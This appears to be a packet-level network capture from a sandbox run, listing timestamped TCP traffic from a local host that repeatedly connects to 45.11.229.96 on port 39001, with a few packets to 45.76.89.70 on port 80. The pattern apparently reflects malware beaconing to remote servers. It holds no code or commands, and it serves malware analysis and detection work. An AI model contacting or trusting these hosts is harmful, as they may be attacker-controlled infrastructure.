Sep 19, 2024 02:28:16.655642986 CEST	49936	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:16.660577059 CEST	39001	49936	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:16.763423920 CEST	49937	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:16.768433094 CEST	39001	49937	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:16.768526077 CEST	49937	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:16.805552959 CEST	49937	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:16.810741901 CEST	39001	49937	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:16.810837984 CEST	49937	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:16.815855026 CEST	39001	49937	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:17.420303106 CEST	39001	49937	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:17.420536995 CEST	49937	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:17.420536995 CEST	49937	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:17.425564051 CEST	39001	49937	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:17.528965950 CEST	49938	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:17.535345078 CEST	39001	49938	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:17.535453081 CEST	49938	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:17.558712959 CEST	49938	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:17.564011097 CEST	39001	49938	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:17.564097881 CEST	49938	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:17.571482897 CEST	39001	49938	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:18.193706989 CEST	39001	49938	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:18.193943024 CEST	49938	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:18.382930994 CEST	49938	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:18.387947083 CEST	39001	49938	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:18.569838047 CEST	49939	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:18.574788094 CEST	39001	49939	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:18.574857950 CEST	49939	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:19.033229113 CEST	49939	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:19.041831970 CEST	39001	49939	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:19.041913033 CEST	49939	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:19.051117897 CEST	39001	49939	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:19.380650997 CEST	39001	49939	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:19.380732059 CEST	49939	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:19.380866051 CEST	49939	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:19.385751963 CEST	39001	49939	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:19.497869968 CEST	49940	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:19.502876997 CEST	39001	49940	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:19.502965927 CEST	49940	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:19.524168968 CEST	49940	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:19.529814005 CEST	39001	49940	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:19.529881001 CEST	49940	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:19.535021067 CEST	39001	49940	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:20.153006077 CEST	39001	49940	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:20.153182030 CEST	49940	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:20.158061981 CEST	49940	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:20.163080931 CEST	39001	49940	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:20.279073000 CEST	49941	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:20.285276890 CEST	39001	49941	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:20.285370111 CEST	49941	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:20.461498976 CEST	49941	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:20.466586113 CEST	39001	49941	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:20.466686964 CEST	49941	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:20.473789930 CEST	39001	49941	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:20.907497883 CEST	39001	49941	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:20.907596111 CEST	49941	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:20.907721996 CEST	49941	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:20.913204908 CEST	39001	49941	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:21.013673067 CEST	49942	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:21.019685030 CEST	39001	49942	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:21.019773006 CEST	49942	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:21.125879049 CEST	49942	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:21.131125927 CEST	39001	49942	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:21.131202936 CEST	49942	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:21.136147976 CEST	39001	49942	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:21.646691084 CEST	39001	49942	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:21.646773100 CEST	49942	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:21.646892071 CEST	49942	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:21.651809931 CEST	39001	49942	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:21.764146090 CEST	49943	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:21.776782036 CEST	39001	49943	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:21.776866913 CEST	49943	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:21.800060987 CEST	49943	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:21.805521011 CEST	39001	49943	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:21.805589914 CEST	49943	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:21.810798883 CEST	39001	49943	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:22.423180103 CEST	39001	49943	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:22.423268080 CEST	49943	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:22.423367023 CEST	49943	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:22.428245068 CEST	39001	49943	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:22.529032946 CEST	49944	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:22.534210920 CEST	39001	49944	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:22.534312010 CEST	49944	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:23.095228910 CEST	49944	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:23.100270033 CEST	39001	49944	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:23.100543976 CEST	49944	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:23.105529070 CEST	39001	49944	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:23.363243103 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:28:23.465666056 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:28:23.626281977 CEST	39001	49944	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:23.630342960 CEST	49944	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:23.630439997 CEST	49944	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:23.635540009 CEST	39001	49944	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:23.747672081 CEST	49945	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:23.752669096 CEST	39001	49945	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:23.754324913 CEST	49945	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:23.795592070 CEST	49945	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:23.800694942 CEST	39001	49945	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:23.802316904 CEST	49945	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:23.807252884 CEST	39001	49945	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:24.390016079 CEST	39001	49945	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:24.390161991 CEST	49945	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:24.393440008 CEST	49945	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:24.400147915 CEST	39001	49945	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:24.497648001 CEST	49946	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:24.509116888 CEST	39001	49946	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:24.509200096 CEST	49946	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:24.593960047 CEST	49946	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:24.606151104 CEST	39001	49946	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:24.606333017 CEST	49946	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:24.611172915 CEST	39001	49946	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:25.183449030 CEST	39001	49946	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:25.183670998 CEST	49946	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:25.287550926 CEST	49946	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:25.292550087 CEST	39001	49946	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:25.497663975 CEST	49947	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:25.502885103 CEST	39001	49947	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:25.503031969 CEST	49947	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:25.735716105 CEST	49947	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:25.740847111 CEST	39001	49947	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:25.740938902 CEST	49947	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:25.745920897 CEST	39001	49947	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:26.800934076 CEST	39001	49947	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:26.801042080 CEST	49947	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:26.801140070 CEST	39001	49947	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:26.801153898 CEST	49947	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:26.801191092 CEST	49947	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:26.801419973 CEST	39001	49947	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:26.801471949 CEST	49947	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:26.805958033 CEST	39001	49947	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:26.919558048 CEST	49948	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:26.924850941 CEST	39001	49948	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:26.924952030 CEST	49948	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:27.208168983 CEST	49948	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:27.213036060 CEST	39001	49948	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:27.213115931 CEST	49948	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:27.217933893 CEST	39001	49948	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:27.554708004 CEST	39001	49948	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:27.554795027 CEST	49948	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:27.554945946 CEST	49948	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:27.559664011 CEST	39001	49948	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:27.680663109 CEST	49949	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:27.685712099 CEST	39001	49949	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:27.685817957 CEST	49949	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:28.266036987 CEST	49949	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:28.271146059 CEST	39001	49949	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:28.271239996 CEST	49949	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:28.276164055 CEST	39001	49949	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:28.699467897 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:28:28.704452038 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:28:28.770021915 CEST	39001	49949	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:28.770277977 CEST	49949	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:28.770277977 CEST	49949	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:28.775477886 CEST	39001	49949	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:28.888350964 CEST	49950	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:28.893120050 CEST	80	49718	45.76.89.70	192.168.2.5
Sep 19, 2024 02:28:28.893349886 CEST	39001	49950	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:28.893444061 CEST	49950	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:28.916673899 CEST	49950	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:28.921506882 CEST	39001	49950	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:28.921577930 CEST	49950	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:28.926415920 CEST	39001	49950	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:29.062601089 CEST	49718	80	192.168.2.5	45.76.89.70
Sep 19, 2024 02:28:29.535784006 CEST	39001	49950	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:29.535993099 CEST	49950	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:29.538326025 CEST	49950	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:29.543224096 CEST	39001	49950	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:29.654213905 CEST	49951	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:29.662234068 CEST	39001	49951	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:29.662324905 CEST	49951	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:29.684894085 CEST	49951	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:29.689831018 CEST	39001	49951	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:29.689899921 CEST	49951	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:29.694758892 CEST	39001	49951	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:30.297739983 CEST	39001	49951	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:30.297848940 CEST	49951	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:30.297985077 CEST	49951	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:30.302849054 CEST	39001	49951	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:30.403796911 CEST	49952	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:30.409203053 CEST	39001	49952	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:30.409301043 CEST	49952	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:30.435199976 CEST	49952	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:30.440383911 CEST	39001	49952	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:30.440464973 CEST	49952	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:30.445445061 CEST	39001	49952	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:31.213145971 CEST	39001	49952	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:31.213248968 CEST	49952	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:31.213359118 CEST	49952	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:31.218187094 CEST	39001	49952	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:31.330528975 CEST	49953	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:31.335454941 CEST	39001	49953	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:31.335525990 CEST	49953	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:31.706785917 CEST	49953	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:31.711920023 CEST	39001	49953	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:31.712004900 CEST	49953	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:31.716845989 CEST	39001	49953	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:31.973388910 CEST	39001	49953	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:31.973579884 CEST	49953	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:31.973861933 CEST	49953	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:31.979305983 CEST	39001	49953	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:32.091434956 CEST	49954	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:32.096545935 CEST	39001	49954	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:32.096642017 CEST	49954	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:32.127111912 CEST	49954	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:32.132038116 CEST	39001	49954	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:32.132126093 CEST	49954	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:32.137018919 CEST	39001	49954	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:32.726856947 CEST	39001	49954	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:32.726983070 CEST	49954	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:32.727072954 CEST	49954	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:32.732884884 CEST	39001	49954	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:32.841509104 CEST	49955	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:32.846889973 CEST	39001	49955	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:32.847019911 CEST	49955	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:32.880954981 CEST	49955	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:32.886121035 CEST	39001	49955	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:32.886204958 CEST	49955	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:32.891154051 CEST	39001	49955	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:33.472433090 CEST	39001	49955	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:33.472616911 CEST	49955	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:33.472657919 CEST	49955	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:33.477667093 CEST	39001	49955	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:33.591556072 CEST	49956	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:33.596621037 CEST	39001	49956	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:33.596729994 CEST	49956	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:33.625989914 CEST	49956	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:33.630973101 CEST	39001	49956	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:33.631036043 CEST	49956	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:33.635860920 CEST	39001	49956	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:34.327708006 CEST	39001	49956	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:34.327807903 CEST	49956	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:34.545707941 CEST	49956	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:34.550617933 CEST	39001	49956	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:34.669471025 CEST	49957	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:34.674626112 CEST	39001	49957	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:34.674712896 CEST	49957	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:34.698168993 CEST	49957	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:34.704179049 CEST	39001	49957	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:34.704253912 CEST	49957	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:34.709712982 CEST	39001	49957	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:35.470609903 CEST	39001	49957	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:35.470755100 CEST	49957	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:35.470839024 CEST	49957	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:35.475725889 CEST	39001	49957	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:35.575933933 CEST	49958	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:35.581139088 CEST	39001	49958	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:35.581245899 CEST	49958	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:35.603110075 CEST	49958	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:35.608098984 CEST	39001	49958	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:35.608175993 CEST	49958	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:35.613090992 CEST	39001	49958	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:36.230659008 CEST	39001	49958	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:36.230767012 CEST	49958	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:36.230901957 CEST	49958	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:36.236119986 CEST	39001	49958	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:36.341257095 CEST	49959	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:36.346563101 CEST	39001	49959	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:36.346725941 CEST	49959	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:36.371689081 CEST	49959	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:36.376806021 CEST	39001	49959	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:36.376890898 CEST	49959	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:36.381726027 CEST	39001	49959	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:36.966654062 CEST	39001	49959	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:36.966804981 CEST	49959	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:36.986603975 CEST	49959	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:36.992417097 CEST	39001	49959	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:37.280754089 CEST	49960	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:37.285882950 CEST	39001	49960	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:37.285984039 CEST	49960	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:37.316874981 CEST	49960	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:37.322052956 CEST	39001	49960	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:37.322139978 CEST	49960	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:37.327073097 CEST	39001	49960	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:37.910191059 CEST	39001	49960	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:37.910250902 CEST	49960	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:37.910363913 CEST	49960	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:37.915246010 CEST	39001	49960	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:38.013257980 CEST	49961	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:38.018596888 CEST	39001	49961	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:38.018676996 CEST	49961	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:38.397713900 CEST	49961	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:38.402856112 CEST	39001	49961	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:38.402945042 CEST	49961	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:38.407872915 CEST	39001	49961	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:38.636648893 CEST	39001	49961	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:38.636856079 CEST	49961	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:38.636961937 CEST	49961	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:38.641973972 CEST	39001	49961	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:38.747658014 CEST	49962	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:38.752655983 CEST	39001	49962	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:38.752754927 CEST	49962	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:38.774054050 CEST	49962	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:38.779062033 CEST	39001	49962	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:38.779112101 CEST	49962	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:38.784029007 CEST	39001	49962	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:39.380203009 CEST	39001	49962	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:39.380426884 CEST	49962	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:39.380426884 CEST	49962	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:39.385338068 CEST	39001	49962	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:39.497728109 CEST	49963	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:39.502796888 CEST	39001	49963	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:39.502916098 CEST	49963	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:39.532310963 CEST	49963	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:39.537437916 CEST	39001	49963	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:39.537554979 CEST	49963	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:39.542403936 CEST	39001	49963	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:40.130979061 CEST	39001	49963	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:40.131082058 CEST	49963	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:40.131273985 CEST	49963	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:40.136023998 CEST	39001	49963	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:40.247675896 CEST	49964	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:40.252533913 CEST	39001	49964	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:40.252608061 CEST	49964	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:40.276992083 CEST	49964	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:40.281864882 CEST	39001	49964	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:40.281929016 CEST	49964	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:40.286775112 CEST	39001	49964	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:40.878276110 CEST	39001	49964	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:40.878349066 CEST	49964	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:40.878451109 CEST	49964	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:40.883337975 CEST	39001	49964	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:40.982148886 CEST	49965	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:40.987004995 CEST	39001	49965	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:40.987162113 CEST	49965	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:41.009864092 CEST	49965	39001	192.168.2.5	45.11.229.96
Sep 19, 2024 02:28:41.014838934 CEST	39001	49965	45.11.229.96	192.168.2.5
Sep 19, 2024 02:28:41.014925003 CEST	49965	39001	192.168.2.5	45.11.229.96
